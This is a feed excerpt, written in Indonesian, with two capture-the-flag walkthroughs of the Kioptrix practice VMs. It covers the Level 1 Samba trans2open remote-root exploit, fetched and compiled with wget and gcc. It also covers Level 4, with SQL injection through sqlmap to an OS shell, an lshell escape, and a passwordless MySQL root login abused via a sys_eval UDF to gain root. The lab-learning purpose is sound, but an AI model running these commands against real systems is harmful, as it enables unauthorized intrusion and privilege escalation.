Setelah melakukan service scanning kita lanjutkan dengan mencari versi dari samba yang sudah diinstall di kiotrix menggunakan modul <span style="font-weight: bold;" class="mycode_b">auxiliary</span> pada <span style="font-weight: bold;" class="mycode_b">metasploit</span><br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>msf &gt; search smb_version<br />
<br />
Matching Modules<br />
================<br />
<br />
   Name                               Disclosure Date  Rank    Description<br />
   ----                               ---------------  ----    -----------<br />
   auxiliary/scanner/smb/smb_version                   normal  SMB Version Detection<br />
<br />
msf &gt; use auxiliary/scanner/smb/smb_version<br />
msf auxiliary(smb_version) &gt; show options<br />
<br />
Module options (auxiliary/scanner/smb/smb_version):<br />
<br />
   Name       Current Setting  Required  Description<br />
   ----       ---------------  --------  -----------<br />
   RHOSTS                      yes       The target address range or CIDR identifier<br />
   SMBDomain  .                no        The Windows domain to use for authentication<br />
   SMBPass                     no        The password for the specified username<br />
   SMBUser                     no        The username to authenticate as<br />
   THREADS    1                yes       The number of concurrent threads<br />
<br />
msf auxiliary(smb_version) &gt; set RHOSTS 192.168.33.128<br />
RHOSTS =&gt; 192.168.33.128<br />
msf auxiliary(smb_version) &gt; run<br />
<br />
[*] 192.168.33.128:139 could not be identified: <span style="color: #ff0000;" class="mycode_color">Unix (Samba 2.2.1a)</span><br />
[*]Scanned 1 of 1 hosts (100% complete)<br />
[*]Auxiliary module execution completed</blockquote>
[*]<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Exploiting Samba</span></span><br />
<br />
Kita tidak perlu bingung mau menggunakan exploit apa, karena samba 2.2.x memiliki exploit yang sudah dibuat yaitu <span style="font-style: italic;" class="mycode_i">0x333hate =&gt; samba 2.2.x remote root</span> exploit, sebenar nya bisa juga dengan trans2open exploit di metasploit, tapi karena metasploit saya lagi error jadi saya make 0x333hate yang base on trans2open.<br />
<br />
~# wget <a href="http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c" target="_blank" class="mycode_url">http://downloads.securityfocus.com/vulne...x333hate.c</a><br />
~# gcc 0x333hate.c -o xpl<br />
~# ./xlp -t 192.168.33.1<br />
<br />
kita sudah mendapatkan shell akses ke system kioptrix.<br />
<br />
<div style="text-align: center;" class="mycode_align"><a href="https://2.bp.blogspot.com/-UckxfiKkYXQ/VtGPpSnfXlI/AAAAAAAAA5c/WsMx7VHVpe4/s1600/Screenshot_2016-02-27_19-58-32.png" target="_blank" class="mycode_url"><img src="https://2.bp.blogspot.com/-UckxfiKkYXQ/VtGPpSnfXlI/AAAAAAAAA5c/WsMx7VHVpe4/s640/Screenshot_2016-02-27_19-58-32.png" width="640" height="265" alt="[Image: Screenshot_2016-02-27_19-58-32.png]" class="mycode_img" /></a></div>
<br />
<br />
[*]<br />
<br />
Ingat <span style="font-weight: bold;" class="mycode_b">"Shell is Only the Beginning"</span> , lalu apa yang harus dilakukan ? karena tidak ada clue, ane iseng mencari file <span style="font-style: italic;" class="mycode_i">.bash_history</span> untuk melihat command apa aja yang pernah di ketik<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><a href="https://1.bp.blogspot.com/-szwVtHkBHtQ/VtGRJB25jgI/AAAAAAAAA5o/n7hx7E4l3rc/s1600/Selection_003.png" target="_blank" class="mycode_url"><img src="https://1.bp.blogspot.com/-szwVtHkBHtQ/VtGRJB25jgI/AAAAAAAAA5o/n7hx7E4l3rc/s640/Selection_003.png" width="640" height="265" alt="[Image: Selection_003.png]" class="mycode_img" /></a></div>
<br />
<br />
[*]<br />
<br />
Ada commad <span style="font-style: italic;" class="mycode_i">mail</span> yang digunakan untuk email proses<br />
lalu tinggal ketik aja di shell nya<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite># mail  &lt;-- untuk melihat list email<br />
# exit &lt;-- agar keluar dari perintah mail<br />
# cat /var/mail/root</blockquote>
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><a href="https://1.bp.blogspot.com/-GEi-CPX2ZDs/VtGSkIhPWnI/AAAAAAAAA50/tyXaOBN08o0/s1600/Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png" target="_blank" class="mycode_url"><img src="https://1.bp.blogspot.com/-GEi-CPX2ZDs/VtGSkIhPWnI/AAAAAAAAA50/tyXaOBN08o0/s640/Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png" width="640" height="531" alt="[Image: Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png]" class="mycode_img" /></a></div>
<br />
<br />
[*]<br />
<br />
Rupa nya isi email tersebut agar kita bisa lanjut ke level 2 kiotrix nya ^_^<br />
<br />
sekian tutorial sederhana dari saya. semoga dapat bermanfaat bagi kita semua dan mohon maaf apa bila ada salah pemberian definisi :D]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Mendapatkan Root Akses Pada Kioptrix Level 4]]></title>
			<link>https://www.backboxindonesia.or.id/thread-19.html</link>
			<pubDate>Thu, 10 Mar 2016 11:05:19 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-19.html</guid>
			<description><![CDATA[<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Pada kesempatan kali ini saya akan membahas cara mendapatkan root akses pada server Kioptrix Level 4. Pada challenge level ini lumayan susah karena di server nya sudah dilengkapi rule iptables sehingga beberapa command seperti wget dari port 80 di block, dll.Oke langsung saja .</span></span></span><br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk image OracleVM nya download disini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Download Kioptrix Level 4</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> </span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ini tampilan awal dari webserver Kioptrix Level 4.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-rPHl22Dve1s/VuE20I5mM-I/AAAAAAAAAws/Af5IV-0UNkI/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-rPHl22Dve1s/VuE20I5mM-I/AAAAAAAAAws/Af5IV-0UNkI/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya mencoba melakukan bypass dengan memasukkan user dan password </span></span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">'=' 'or'</span></span></span></span><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> tapi ternyata gagal. Berarti emmang tidak bisa di bypass.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tapi ketika saya masukkan password dan user nya berupa </span></span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">'</span></span></span></span><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> ( petik satu ) , saya mendapatkan error.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-L9zwLV1Hchs/VuE3csN5rAI/AAAAAAAAAw0/SIELjY-KrDM/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-L9zwLV1Hchs/VuE3csN5rAI/AAAAAAAAAw0/SIELjY-KrDM/s320/kioptrix4.png" width="320" height="69" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Yup, kemungkinan vuln sqli.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya coba melakukan sqli post data menggunakan sqlmap.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun sebelumya saya gunakan live http header untuk meng-capture post di form login tadi.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-ZarNXSbzB8g/VuE36B32t1I/AAAAAAAAAw4/LdJIPipi5So/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://2.bp.blogspot.com/-ZarNXSbzB8g/VuE36B32t1I/AAAAAAAAAw4/LdJIPipi5So/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">sehingga command di sqlmap nya :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">yuyudhn@linuxsec~&#36; sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&amp;mypassword=%27&amp;Submit=Login" --dbs</span></span></span><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> .</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Lanjutkan terus sampai menemukan password dan username nya.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://3.bp.blogspot.com/-FDHf48dHbFk/VuE56IYo6jI/AAAAAAAAAxI/wXIGuJB94M8/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://3.bp.blogspot.com/-FDHf48dHbFk/VuE56IYo6jI/AAAAAAAAAxI/wXIGuJB94M8/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata password nya plantext. Saya coba login dengan user john, karena password nya lebih mudah diingat.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun ketika saya login ternyata hanya tampilan username dan password saja.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-i1-9VAZoaXA/VuE6PB2tyaI/AAAAAAAAAxM/BXJd14HreDs/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-i1-9VAZoaXA/VuE6PB2tyaI/AAAAAAAAAxM/BXJd14HreDs/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Karena tidak ada clue lain , kita coba spawn shell via sqlmap.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> </span></span></span><span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">yuyudhn@linuxsec~&#36; sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&amp;mypassword=%27&amp;Submit=Login" --os-shell</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-qOzW7IOOZZI/VuE65nDXluI/AAAAAAAAAxY/2fTt0FO5hA4/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-qOzW7IOOZZI/VuE65nDXluI/AAAAAAAAAxY/2fTt0FO5hA4/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk web server pilih php, direktori nya pilih /var/www , karena kita tadi sudah tahu di awal.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-EfPPxtCaIR0/VuE7U5iERiI/AAAAAAAAAxg/esoaQ4GHp1s/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-EfPPxtCaIR0/VuE7U5iERiI/AAAAAAAAAxg/esoaQ4GHp1s/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekarang kita coba mencari informasi database dengan melihat source checklogin.php .</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">os-shell&gt; cat checklogin.php</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-9Hu5n9r3Fpk/VuE71-5eBpI/AAAAAAAAAxo/ASK_T-CdnS0/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-9Hu5n9r3Fpk/VuE71-5eBpI/AAAAAAAAAxo/ASK_T-CdnS0/s320/kioptrix4.png" width="320" height="120" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oppss... root user without password.</span></span></span><br />
<br />
<br />
===<br />
Lanjut kebawah...<br />
<hr class="mycode_hr" />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita tinggalkan dulu. Sekarang kita coba login ssh dengan user john dan password MyNameIsJohn .</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata masuk.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-vH_WoGQY_ww/VuE_JJeC4AI/AAAAAAAAAx4/Z3YS6bzMyFM/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-vH_WoGQY_ww/VuE_JJeC4AI/AAAAAAAAAx4/Z3YS6bzMyFM/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun ternyata command command nya dibatasi.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Dan setelah googling kesana kemari akhirnya saya tau kalau ini nama nya lshell ( limited shell ) .</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tapi sepertinya di versi yang terinstall disini masih terdapat bug.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sehingga kita bisa "keluar" dari batasan tadi dengan command :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">john&#36; echo os.system('/bin/sh')</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ini untuk memanggil bash interpreter.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-BiqOkH_AAHY/VuFAE2NvUAI/AAAAAAAAAyA/7LI9rp4pX0s/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-BiqOkH_AAHY/VuFAE2NvUAI/AAAAAAAAAyA/7LI9rp4pX0s/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Karena goal akhir adalah mendapatkan hak akses root dengan cara apapun, saya pun mencoba untuk mendapatkan root dengan sudo. Tapi ternyata gagal.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-XA5UFa1FIcs/VuFAtjLugYI/AAAAAAAAAyI/RknJ0lN3OCo/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://1.bp.blogspot.com/-XA5UFa1FIcs/VuFAtjLugYI/AAAAAAAAAyI/RknJ0lN3OCo/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya coba login ke mysql dengan root user dan tanpa password. ( di step sebelumnya kita sudah mengetahui kalau root tidak di password )</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">&#36; mysql -u root</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-7oLNQGxZVs4/VuFBqHO-kqI/AAAAAAAAAyQ/OG_SebfLgCw/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-7oLNQGxZVs4/VuFBqHO-kqI/AAAAAAAAAyQ/OG_SebfLgCw/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah kita tau versi MySQL nya adalah versi 5 dimana disini mendukung command untuk memanggil perintah eksternal lewat mysql pengunakan plugins mysqludf.</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; quit</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">&#36; whereis lib_mysqludf_sys.so</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-SvTvxm-eCTQ/VuFDBgt329I/AAAAAAAAAyc/fCJir2oxDiI/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-SvTvxm-eCTQ/VuFDBgt329I/AAAAAAAAAyc/fCJir2oxDiI/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nice, ternyata kioptrix sudah menyediakannya untuk kita sehingga kita tidak perlu mendownloadnya.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita masuk lagi ke mysql dan masuk ke salahsatu database.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-E56setESee0/VuFDtpsfWZI/AAAAAAAAAyk/3t3whm3Bywc/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://4.bp.blogspot.com/-E56setESee0/VuFDtpsfWZI/AAAAAAAAAyk/3t3whm3Bywc/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun ketika saya memasukkan command :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; select sys_eval('id');</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata mendapat error karena module nya tidak ada.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekarang masukkan command :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; create function sys_eval returns string soname 'lib_mysqludf_sys.so';</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-Mf7JUmGbsuo/VuFEnYELkuI/AAAAAAAAAys/pZrAuX1tb0M/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://1.bp.blogspot.com/-Mf7JUmGbsuo/VuFEnYELkuI/AAAAAAAAAys/pZrAuX1tb0M/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root...</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sebenarnya karena goal dari Kioptrix adalah mendapat root, kita sudah selesai disini.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tapi saya coba untuk mengangkat user john menjadi sudoers.</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; select sys_eval('usermod -a -G admin john');</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-sTdzKate2FE/VuFFL0Gmf1I/AAAAAAAAAy0/A6yEsLznIpQ/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://1.bp.blogspot.com/-sTdzKate2FE/VuFFL0Gmf1I/AAAAAAAAAy0/A6yEsLznIpQ/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt;exit</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">&#36; sudo su</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root@Kioptrix4:/home/john# id</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">uid=0(root) gid=0(root) groups=0(root)</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root@Kioptrix4:/home/john# whoami</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root</span></span></span><br />
